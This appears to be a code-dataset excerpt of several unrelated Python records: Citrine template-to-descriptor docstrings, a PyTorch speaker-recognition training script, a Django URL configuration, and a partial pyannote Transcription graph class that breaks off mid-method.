Build a PlatformVocabulary from the templates visible to a project.
All of the templates with the given scope are downloaded and converted into descriptors.
The uid values associated with that scope are used as the index into the dictionary.
For example, using scope "my_templates" with a template with
uids={"my_templates": "density"} would be indexed into the dictionary as "density".
Parameters
----------
project: Project
Project on the Citrine Platform to read templates from
scope: str
Unique ID scope from which to pull the template names
Returns
-------
PlatformVocabulary
Convert a GEMD attribute template into an AI Engine Descriptor.
IntBounds cannot be converted because they have no matching descriptor type.
CompositionBounds can only be converted when every component is an element, in which case
they are converted to ChemicalFormulaDescriptors.
Parameters
----------
template: AttributeTemplate
Template to convert into a descriptor
headers: List[str]
Names of parent relationships to includes as prefixes
to the template name in the descriptor key
Default: []
Returns
-------
Descriptor
Descriptor with a key matching the template name and type corresponding to the bounds
Full history not needed when full_history = False But is convenient to populate templates for terminal material Limit the search to contain the terminal material/process/measurements Edge case safety Extract templates and formatted keys Extract all templates Assemble to descriptors | 3,134 | en | 0.697876 |
#!/usr/bin/env python
# encoding: utf-8
"""
@Author: yangwenhao
@Contact: 874681044@qq.com
@Software: PyCharm
@File: train_lores10_kaldi.py
@Time: 2020/4/4 11:14 AM
@Overview:
"""
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import time
# Version conflict
import warnings
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchvision.transforms as transforms
from kaldi_io import read_mat, read_vec_flt
from tensorboardX import SummaryWriter
from torch.autograd import Variable
from torch.optim.lr_scheduler import MultiStepLR, ExponentialLR
from tqdm import tqdm
from Define_Model.LossFunction import CenterLoss
from Define_Model.SoftmaxLoss import AngleSoftmaxLoss, AngleLinear, AdditiveMarginLinear, AMSoftmaxLoss
from Define_Model.model import PairwiseDistance
from Process_Data import constants as c
from Process_Data.KaldiDataset import ScriptTestDataset, KaldiExtractDataset, \
ScriptVerifyDataset
from Process_Data.LmdbDataset import EgsDataset
from Process_Data.audio_processing import concateinputfromMFB, to2tensor, varLengthFeat, ConcateVarInput
from Process_Data.audio_processing import toMFB, totensor, truncatedinput, read_audio
from TrainAndTest.common_func import create_optimizer, create_model, verification_test, verification_extract
from eval_metrics import evaluate_kaldi_eer, evaluate_kaldi_mindcf
from logger import NewLogger
warnings.filterwarnings("ignore")
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')
# Data options
parser.add_argument('--train-dir', type=str, help='path to dataset')
parser.add_argument('--valid-dir', type=str, help='path to dataset')
parser.add_argument('--test-dir', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--trials', type=str, default='trials', help='trials filename')
parser.add_argument('--domain', action='store_true', default=False, help='set domain in dataset')
parser.add_argument('--nj', default=12, type=int, metavar='NJOB', help='num of job')
parser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],
help='number of jobs to make feats (default: 10)')
parser.add_argument('--check-path', default='Data/checkpoint/LoResNet10/spect/soft',
help='folder to output model checkpoints')
parser.add_argument('--save-init', action='store_true', default=True, help='need to make mfb file')
parser.add_argument('--resume',
default='Data/checkpoint/LoResNet10/spect/soft/checkpoint_10.pth', type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--start-epoch', default=1, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--epochs', type=int, default=20, metavar='E',
help='number of epochs to train (default: 10)')
parser.add_argument('--scheduler', default='multi', type=str,
metavar='SCH', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--gamma', default=0.75, type=float,
metavar='GAMMA', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--milestones', default='10,15', type=str,
metavar='MIL', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',
help='minimum epoch for initial parameter using softmax (default: 2')
parser.add_argument('--veri-pairs', type=int, default=12800, metavar='VP',
help='number of epochs to train (default: 10)')
# Training options
# Model options
parser.add_argument('--model', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--resnet-size', default=8, type=int,
metavar='RES', help='The channels of convs layers)')
parser.add_argument('--inst-norm', action='store_true', default=False,
help='replace batchnorm with instance norm')
parser.add_argument('--channels', default='64,128,256', type=str,
metavar='CHA', help='The channels of convs layers)')
parser.add_argument('--feat-dim', default=161, type=int, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--remove-vad', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--alpha', default=12, type=float, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE',
help='kernel size of conv filters')
parser.add_argument('--cos-sim', action='store_true', default=True,
help='using Cosine similarity')
parser.add_argument('--avg-size', type=int, default=4, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-a', type=int, default=128, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-b', type=int, default=64, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-o', type=int, default=32, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
parser.add_argument('--input-per-spks', type=int, default=224, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-batch-size', type=int, default=1, metavar='BST',
help='input batch size for testing (default: 64)')
parser.add_argument('--dropout-p', type=float, default=0., metavar='BST',
help='input batch size for testing (default: 64)')
# loss configure
parser.add_argument('--loss-type', type=str, default='soft', choices=['soft', 'asoft', 'center', 'amsoft'],
help='path to voxceleb1 test dataset')
parser.add_argument('--finetune', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
parser.add_argument('--dom-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
parser.add_argument('--sim-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
help='the ratio softmax loss - triplet loss (default: 2.0')
# args for additive margin-softmax
parser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',
help='the margin value for the angualr softmax loss function (default: 3.0')
parser.add_argument('--s', type=float, default=15, metavar='S',
help='the margin value for the angualr softmax loss function (default: 3.0')
# args for a-softmax
parser.add_argument('--m', type=int, default=3, metavar='M',
help='the margin value for the angualr softmax loss function (default: 3.0')
parser.add_argument('--lambda-min', type=int, default=5, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--lambda-max', type=float, default=1000, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.125)')
parser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',
help='learning rate decay ratio (default: 1e-4')
parser.add_argument('--weight-decay', default=5e-4, type=float,
metavar='WEI', help='weight decay (default: 0.0)')
parser.add_argument('--momentum', default=0.9, type=float,
metavar='MOM', help='momentum for sgd (default: 0.9)')
parser.add_argument('--dampening', default=0, type=float,
metavar='DAM', help='dampening for sgd (default: 0.0)')
parser.add_argument('--optimizer', default='sgd', type=str,
metavar='OPT', help='The optimizer to use (default: Adagrad)')
# Device options
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--gpu-id', default='1', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--seed', type=int, default=123456, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--log-interval', type=int, default=1, metavar='LI',
help='how many batches to wait before logging training status')
parser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',
help='choose the acoustic features type.')
parser.add_argument('--makemfb', action='store_true', default=False,
help='need to make mfb file')
parser.add_argument('--makespec', action='store_true', default=False,
help='need to make spectrograms file')
args = parser.parse_args()
# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in
# order to prevent any memory allocation on unused GPUs
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
args.cuda = not args.no_cuda and torch.cuda.is_available()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# torch.multiprocessing.set_sharing_strategy('file_system')
if args.cuda:
torch.cuda.manual_seed_all(args.seed)
cudnn.benchmark = True
# create logger Define visulaize SummaryWriter instance
writer = SummaryWriter(logdir=args.check_path, filename_suffix='_first')
sys.stdout = NewLogger(osp.join(args.check_path, 'log.txt'))
kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}
if not os.path.exists(args.check_path):
os.makedirs(args.check_path)
opt_kwargs = {'lr': args.lr,
'lr_decay': args.lr_decay,
'weight_decay': args.weight_decay,
'dampening': args.dampening,
'momentum': args.momentum}
l2_dist = nn.CosineSimilarity(dim=1, eps=1e-6) if args.cos_sim else PairwiseDistance(2)
if args.acoustic_feature == 'fbank':
transform = transforms.Compose([
concateinputfromMFB(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# varLengthFeat(),
to2tensor()
])
transform_T = transforms.Compose([
ConcateVarInput(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# to2tensor()
])
transform_V = transforms.Compose([
varLengthFeat(remove_vad=args.remove_vad),
to2tensor()
])
else:
transform = transforms.Compose([
truncatedinput(),
toMFB(),
totensor(),
# tonormal()
])
file_loader = read_audio
# pdb.set_trace()
torch.multiprocessing.set_sharing_strategy('file_system')
if args.feat_format == 'kaldi':
file_loader = read_mat
elif args.feat_format == 'npy':
file_loader = np.load
train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
test_dir = ScriptTestDataset(dir=args.test_dir, loader=np.load, transform=transform_T)
if len(test_dir) < args.veri_pairs:
args.veri_pairs = len(test_dir)
print('There are %d verification pairs.' % len(test_dir))
else:
test_dir.partition(args.veri_pairs)
valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
def main():
# Views the training images and displays the distance on anchor-negative and anchor-positive
# test_display_triplet_distance = False
# print the experiment configuration
print('\nCurrent time is \33[91m{}\33[0m.'.format(str(time.asctime())))
print('Parsed options: {}'.format(vars(args)))
print('Number of Speakers: {}.\n'.format(train_dir.num_spks))
# instantiate model and initialize weights
kernel_size = args.kernel_size.split(',')
kernel_size = [int(x) for x in kernel_size]
padding = [int((x - 1) / 2) for x in kernel_size]
kernel_size = tuple(kernel_size)
padding = tuple(padding)
channels = args.channels.split(',')
channels = [int(x) for x in channels]
model_kwargs = {'embedding_size_a': args.embedding_size_a,
'embedding_size_b': args.embedding_size_b,
'embedding_size_o': args.embedding_size_o,
'inst_norm': args.inst_norm,
'resnet_size': args.resnet_size,
'num_classes_a': train_dir.num_spks,
'num_classes_b': train_dir.num_doms,
'channels': channels,
'avg_size': args.avg_size,
'alpha': args.alpha,
'kernel_size': kernel_size,
'padding': padding,
'dropout_p': args.dropout_p}
print('Model options: {}'.format(model_kwargs))
model = create_model(args.model, **model_kwargs)
start_epoch = 0
if args.save_init and not args.finetune:
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, start_epoch)
torch.save(model, check_path)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {}'.format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
filtered = {k: v for k, v in checkpoint['state_dict'].items() if 'num_batches_tracked' not in k}
model_dict = model.state_dict()
model_dict.update(filtered)
model.load_state_dict(model_dict)
#
# model.dropout.p = args.dropout_p
else:
print('=> no checkpoint found at {}'.format(args.resume))
ce_criterion = nn.CrossEntropyLoss()
if args.loss_type == 'soft':
xe_criterion = None
elif args.loss_type == 'asoft':
ce_criterion = None
model.classifier_spk = AngleLinear(in_features=args.embedding_size, out_features=train_dir.num_spks, m=args.m)
xe_criterion = AngleSoftmaxLoss(lambda_min=args.lambda_min, lambda_max=args.lambda_max)
elif args.loss_type == 'center':
xe_criterion = CenterLoss(num_classes=train_dir.num_spks, feat_dim=args.embedding_size)
elif args.loss_type == 'amsoft':
ce_criterion = None
model.classifier_spk = AdditiveMarginLinear(feat_dim=args.embedding_size, n_classes=train_dir.num_spks)
xe_criterion = AMSoftmaxLoss(margin=args.margin, s=args.s)
optimizer = create_optimizer(model.parameters(), args.optimizer, **opt_kwargs)
if args.loss_type == 'center':
optimizer = torch.optim.SGD([{'params': xe_criterion.parameters(), 'lr': args.lr * 5},
{'params': model.parameters()}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.finetune:
if args.loss_type == 'asoft' or args.loss_type == 'amsoft':
classifier_params = list(map(id, model.classifier.parameters()))
rest_params = filter(lambda p: id(p) not in classifier_params, model.parameters())
optimizer = torch.optim.SGD([{'params': model.classifier.parameters(), 'lr': args.lr * 5},
{'params': rest_params}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.scheduler == 'exp':
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
else:
milestones = args.milestones.split(',')
milestones = [int(x) for x in milestones]
milestones.sort()
scheduler = MultiStepLR(optimizer, milestones=milestones, gamma=0.1)
ce = [ce_criterion, xe_criterion]
start = args.start_epoch + start_epoch
print('Start epoch is : ' + str(start))
# start = 0
end = start + args.epochs
train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=False, **kwargs)
valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dir, batch_size=args.test_batch_size, shuffle=False, **kwargs)
# sitw_test_loader = torch.utils.data.DataLoader(sitw_test_dir, batch_size=args.test_batch_size,
# shuffle=False, **kwargs)
# sitw_dev_loader = torch.utils.data.DataLoader(sitw_dev_part, batch_size=args.test_batch_size, shuffle=False,
# **kwargs)
if args.cuda:
model = model.cuda()
for i in range(len(ce)):
if ce[i] != None:
ce[i] = ce[i].cuda()
print('Dropout is {}.'.format(model.dropout_p))
for epoch in range(start, end):
# pdb.set_trace()
print('\n\33[1;34m Current \'{}\' learning rate is '.format(args.optimizer), end='')
for param_group in optimizer.param_groups:
print('{:.5f} '.format(param_group['lr']), end='')
print(' \33[0m')
if epoch % 2 == 1 and epoch != (end - 1):
test(test_loader, valid_loader, model, epoch)
train(train_loader, model, ce, optimizer, epoch)
if epoch % 4 == 1 or epoch == (end - 1):
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, epoch)
torch.save({'epoch': epoch,
'state_dict': model.state_dict(),
'criterion': ce},
check_path)
scheduler.step()
# exit(1)
extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=np.load)
extract_loader = torch.utils.data.DataLoader(extract_dir, batch_size=1, shuffle=False, **kwargs)
xvector_dir = args.check_path
xvector_dir = xvector_dir.replace('checkpoint', 'xvector')
verification_extract(extract_loader, model, xvector_dir)
verify_dir = ScriptVerifyDataset(dir=args.test_dir, trials_file=args.trials, xvectors_dir=xvector_dir,
loader=read_vec_flt)
verify_loader = torch.utils.data.DataLoader(verify_dir, batch_size=64, shuffle=False, **kwargs)
verification_test(test_loader=verify_loader, dist_type=('cos' if args.cos_sim else 'l2'),
log_interval=args.log_interval)
writer.close()
def train(train_loader, model, ce, optimizer, epoch):
# switch to evaluate mode
model.train()
lambda_ = 2. / (1 + np.exp(-10. * epoch / args.epochs)) - 1.
model.grl.set_lambda(lambda_)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
total_loss_a = 0.
total_loss_b = 0.
total_loss_c = 0.
total_loss = 0.
# for param_group in optimizer.param_groups:
# print('\33[1;34m Optimizer \'{}\' learning rate is {}.\33[0m'.format(args.optimizer, param_group['lr']))
ce_criterion, xe_criterion = ce
pbar = tqdm(enumerate(train_loader))
output_softmax = nn.Softmax(dim=1)
for batch_idx, (data, label_a, label_b) in pbar:
if args.cuda:
data = data.cuda()
data, label_a = Variable(data), Variable(label_a)
label_b = Variable(label_b)
logits_spk, feat_spk, logits_dom, feat_dom = model(data)
true_labels_a = label_a.cuda()
true_labels_b = label_b.cuda()
# pdb.set_trace()
# cos_theta, phi_theta = classfier
spk_label = logits_spk
dom_lable = logits_dom
if args.loss_type == 'soft':
spk_loss = ce_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'asoft':
spk_label, _ = spk_label
spk_loss = xe_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'center':
loss_cent = ce_criterion(logits_spk, true_labels_a)
loss_xent = xe_criterion(feat_spk, true_labels_a)
spk_loss = args.loss_ratio * loss_xent + loss_cent
elif args.loss_type == 'amsoft':
spk_loss = xe_criterion(logits_spk, true_labels_a)
dom_loss = (args.dom_ratio * ce_criterion(dom_lable, true_labels_b))
loss = spk_loss + dom_loss
if args.sim_ratio:
spk_dom_sim_loss = torch.cosine_similarity(feat_spk, feat_dom, dim=1).pow(2).mean()
spk_dom_sim_loss = args.sim_ratio * spk_dom_sim_loss
loss += spk_dom_sim_loss
predicted_labels_a = output_softmax(spk_label)
predicted_one_labels_a = torch.max(predicted_labels_a, dim=1)[1]
minibatch_correct_a = float((predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item())
minibatch_acc_a = minibatch_correct_a / len(predicted_one_labels_a)
correct_a += minibatch_correct_a
predicted_labels_b = output_softmax(dom_lable)
predicted_one_labels_b = torch.max(predicted_labels_b, dim=1)[1]
minibatch_correct_b = float((predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item())
minibatch_acc_b = minibatch_correct_b / len(predicted_one_labels_b)
correct_b += minibatch_correct_b
total_datasize += len(predicted_one_labels_a)
total_loss_a += float(spk_loss.item())
total_loss_b += float(dom_loss.item())
total_loss_c += float(spk_dom_sim_loss.item()) if args.sim_ratio else 0.
total_loss += float(loss.item())
# compute gradient and update weights
optimizer.zero_grad()
loss.backward()
if args.loss_type == 'center' and args.loss_ratio != 0:
for param in xe_criterion.parameters():
param.grad.data *= (1. / args.loss_ratio)
optimizer.step()
if batch_idx % args.log_interval == 0:
pbar.set_description(
'Train Epoch {:2d}: [{:4d}/{:4d}({:3.0f}%)] AvgLoss: {:.4f} SpkLoss: {:.4f} DomLoss: {:.4f} ' \
'SimLoss: {:.4f} Batch Accuracy: Spk: {:.4f}%, Dom: {:.4f}%'.format(
epoch,
batch_idx,
len(train_loader),
100. * batch_idx / len(train_loader),
total_loss / (batch_idx + 1),
total_loss_a / (batch_idx + 1),
total_loss_b / (batch_idx + 1),
total_loss_c / (batch_idx + 1),
100. * minibatch_acc_a,
100. * minibatch_acc_b))
print('\n\33[91mTrain Epoch {}: Avg loss: {:.4f} Spk Loss: {:.4f} Dom Loss: {:.4f} .'.format(epoch,
total_loss / len(
train_loader),
total_loss_a / len(
train_loader),
total_loss_b / len(
train_loader)))
print('Spk Accuracy:{:.4f}%, Dom Accuracy:{:.4f}%.\33[0m'.format(100 * correct_a / total_datasize,
100 * correct_b / total_datasize, ))
writer.add_scalar('Train/Spk_Accuracy', correct_a / total_datasize, epoch)
writer.add_scalar('Train/Dom_Accuracy', correct_b / total_datasize, epoch)
writer.add_scalar('Train/Loss', total_loss / len(train_loader), epoch)
torch.cuda.empty_cache()
def test(test_loader, valid_loader, model, epoch):
# switch to evaluate mode
model.eval()
valid_pbar = tqdm(enumerate(valid_loader))
softmax = nn.Softmax(dim=1)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
for batch_idx, (data, label_a, label_b) in valid_pbar:
data = Variable(data.cuda())
# compute output
out_a, _, out_b, _ = model(data)
if args.loss_type == 'asoft':
predicted_labels_a, _ = out_a
else:
predicted_labels_a = out_a
predicted_labels_b = out_b
true_labels_a = Variable(label_a.cuda())
true_labels_b = Variable(label_b.cuda())
# pdb.set_trace()
predicted_one_labels_a = softmax(predicted_labels_a)
predicted_one_labels_a = torch.max(predicted_one_labels_a, dim=1)[1]
batch_correct_a = (predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item()
minibatch_acc_a = float(batch_correct_a / len(predicted_one_labels_a))
correct_a += batch_correct_a
predicted_one_labels_b = softmax(predicted_labels_b)
predicted_one_labels_b = torch.max(predicted_one_labels_b, dim=1)[1]
batch_correct_b = (predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item()
minibatch_acc_b = float(batch_correct_b / len(predicted_one_labels_b))
correct_b += batch_correct_b
total_datasize += len(predicted_one_labels_a)
if batch_idx % args.log_interval == 0:
valid_pbar.set_description(
'Valid Epoch: {:2d} [{:8d}/{:8d} ({:3.0f}%)] Batch Spk Accuracy: {:.4f}% Dom Accuracy: {:.4f}%'.format(
epoch,
batch_idx * len(data),
len(valid_loader.dataset),
100. * batch_idx / len(valid_loader),
100. * minibatch_acc_a,
100. * minibatch_acc_b
))
spk_valid_accuracy = 100. * correct_a / total_datasize
dom_valid_accuracy = 100. * correct_b / total_datasize
writer.add_scalar('Test/Spk_Valid_Accuracy', spk_valid_accuracy, epoch)
writer.add_scalar('Test/Dom_Valid_Accuracy', dom_valid_accuracy, epoch)
torch.cuda.empty_cache()
labels, distances = [], []
pbar = tqdm(enumerate(test_loader))
for batch_idx, (data_a, data_p, label) in pbar:
vec_a_shape = data_a.shape
vec_p_shape = data_p.shape
# pdb.set_trace()
data_a = data_a.reshape(vec_a_shape[0] * vec_a_shape[1], 1, vec_a_shape[2], vec_a_shape[3])
data_p = data_p.reshape(vec_p_shape[0] * vec_p_shape[1], 1, vec_p_shape[2], vec_p_shape[3])
if args.cuda:
data_a, data_p = data_a.cuda(), data_p.cuda()
data_a, data_p, label = Variable(data_a), Variable(data_p), Variable(label)
# compute output
_, out_a_, _, _ = model(data_a)
_, out_p_, _, _ = model(data_p)
# out_a = out_a_
# out_p = out_p_
out_a = out_a_.reshape(vec_a_shape[0], vec_a_shape[1], args.embedding_size_a).mean(dim=1)
out_p = out_p_.reshape(vec_p_shape[0], vec_p_shape[1], args.embedding_size_a).mean(dim=1)
dists = l2_dist.forward(out_a, out_p) # torch.sqrt(torch.sum((out_a - out_p) ** 2, 1)) # euclidean distance
# dists = dists.reshape(vec_shape[0], vec_shape[1]).mean(dim=1)
dists = dists.data.cpu().numpy()
distances.append(dists)
labels.append(label.data.cpu().numpy())
if batch_idx % args.log_interval == 0:
pbar.set_description('Test Epoch: {} [{}/{} ({:.0f}%)]'.format(
epoch, batch_idx * len(data_a), len(test_loader.dataset), 100. * batch_idx / len(test_loader)))
labels = np.array([sublabel for label in labels for sublabel in label])
distances = np.array([subdist for dist in distances for subdist in dist])
eer, eer_threshold, accuracy = evaluate_kaldi_eer(distances, labels, cos=args.cos_sim, re_thre=True)
writer.add_scalar('Test/EER', 100. * eer, epoch)
writer.add_scalar('Test/Threshold', eer_threshold, epoch)
mindcf_01, mindcf_001 = evaluate_kaldi_mindcf(distances, labels)
writer.add_scalar('Test/mindcf-0.01', mindcf_01, epoch)
writer.add_scalar('Test/mindcf-0.001', mindcf_001, epoch)
dist_type = 'cos' if args.cos_sim else 'l2'
print('\nFor %s_distance, ' % dist_type)
print(' \33[91mTest Spk ERR is {:.4f}%, Threshold is {}'.format(100. * eer, eer_threshold))
print(' mindcf-0.01 {:.4f}, mindcf-0.001 {:.4f},'.format(mindcf_01, mindcf_001))
print(' Valid Spk Accuracy is %.4f %%, Dom Accuracy is %.4f %% .\33[0m' % (spk_valid_accuracy, dom_valid_accuracy))
torch.cuda.empty_cache()
if __name__ == '__main__':
main()
| TrainAndTest/Spectrogram/train_domres_egs.py | 29,807 | @Author: yangwenhao
@Contact: 874681044@qq.com
@Software: PyCharm
@File: train_lores10_kaldi.py
@Time: 2020/4/4 11:14 AM
@Overview:
!/usr/bin/env python encoding: utf-8 Version conflict Training settings Data options Training options Model options loss configure args for additive margin-softmax args for a-softmax Device options Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in order to prevent any memory allocation on unused GPUs torch.multiprocessing.set_sharing_strategy('file_system') create logger Define visulaize SummaryWriter instance varLengthFeat(), to2tensor() tonormal() pdb.set_trace() Views the training images and displays the distance on anchor-negative and anchor-positive test_display_triplet_distance = False print the experiment configuration instantiate model and initialize weights model.dropout.p = args.dropout_p start = 0 sitw_test_loader = torch.utils.data.DataLoader(sitw_test_dir, batch_size=args.test_batch_size, shuffle=False, **kwargs) sitw_dev_loader = torch.utils.data.DataLoader(sitw_dev_part, batch_size=args.test_batch_size, shuffle=False, **kwargs) pdb.set_trace() exit(1) switch to evaluate mode for param_group in optimizer.param_groups: print('\33[1;34m Optimizer \'{}\' learning rate is {}.\33[0m'.format(args.optimizer, param_group['lr'])) pdb.set_trace() cos_theta, phi_theta = classfier compute gradient and update weights switch to evaluate mode compute output pdb.set_trace() pdb.set_trace() compute output out_a = out_a_ out_p = out_p_ torch.sqrt(torch.sum((out_a - out_p) ** 2, 1)) euclidean distance dists = dists.reshape(vec_shape[0], vec_shape[1]).mean(dim=1) | 1,733 | en | 0.505033 |
""" Contains the urls for the maingui module"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('login', views.login, name='login'),
]
| maingui/urls.py | 204 | Contains the urls for the maingui module | 40 | en | 0.70313 |
#!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# Hervé BREDIN - http://herve.niderb.fr
from __future__ import unicode_literals
import networkx as nx
from networkx.readwrite.json_graph import node_link_data, node_link_graph
from time import T, TStart, TEnd
from segment import Segment
from json import PYANNOTE_JSON_TRANSCRIPTION
from util import pairwise
class Transcription(nx.MultiDiGraph):
"""Transcription stored as annotation graph"""
def __init__(self, graph=None, **attrs):
super(Transcription, self).__init__(data=graph)
self.graph.update(attrs)
def drifting(self):
"""Get list of drifting times"""
return [n for n in self if n.drifting]
def anchored(self):
"""Get list of anchored times"""
return [n for n in self if n.anchored]
def add_edge(self, t1, t2, key=None, attr_dict=None, **attrs):
"""Add annotation to the graph between times t1 and t2
Parameters
----------
t1, t2: float, str or None
data : dict, optional
{annotation_type: annotation_value} dictionary
Example
-------
>>> G = Transcription()
>>> G.add_edge(T(1.), T(), speaker='John', 'speech'='Hello world!')
"""
t1 = T(t1)
t2 = T(t2)
# make sure Ts are connected in correct chronological order
if t1.anchored and t2.anchored:
assert t1 <= t2
super(Transcription, self).add_edge(
t1, t2, key=key, attr_dict=attr_dict, **attrs)
def relabel_drifting_nodes(self, mapping=None):
"""Relabel drifting nodes
Parameters
----------
mapping : dict, optional
A dictionary with the old labels as keys and new labels as values.
Returns
-------
g : Transcription
New annotation graph
mapping : dict
A dictionary with the new labels as keys and old labels as values.
Can be used to get back to the version before relabelling.
"""
if mapping is None:
old2new = {n: T() for n in self.drifting()}
else:
old2new = dict(mapping)
new2old = {new: old for old, new in old2new.iteritems()}
return nx.relabel_nodes(self, old2new, copy=True), new2old
def crop(self, source, target=None):
"""Get minimum subgraph between source time and target time
Parameters
----------
source : Segment
target : float or str, optional
Returns
-------
g : Transcription
Sub-graph between source and target
"""
if isinstance(source, Segment):
source, target = source.start, source.end
source = T(source)
target = T(target)
# sorted list of anchored times will be needed later
# make sure it is computed only once
if source.anchored or target.anchored:
anchored = sorted(self.anchored())
# ~~~ from_source = set of nodes reachable from source ~~~~~~~~~~~~~~~~
# source is drifting
if source.drifting:
if source not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % source)
else:
from_source = {source} | nx.algorithms.descendants(self, source)
# source is anchored
else:
# if source is in graph, then it is easy
if source in self:
from_source = {source} | nx.algorithms.descendants(self, source)
# if source is not in graph,
# find anchored time just before source
else:
if source < anchored[0]:
from_source = set(self) # take no risk!
else:
before = [n for n in anchored if n <= source][-1]
from_source = {before} | nx.algorithms.descendants(self, before)
# ~~~ to_target = set of nodes from which target is reachable ~~~~~~~~~
# target is drifting
if target.drifting:
if target not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % target)
else:
to_target = {target} | nx.algorithms.ancestors(self, target)
else:
# if target is in graph, then it is easy
if target in self:
to_target = {target} | nx.algorithms.ancestors(self, target)
# if target is not in graph,
# find anchored time just after target
else:
if target > anchored[-1]:
to_target = set(self) # take no risk!
else:
after = [n for n in anchored if n >= target][0]
to_target = {after} | nx.algorithms.ancestors(self, after)
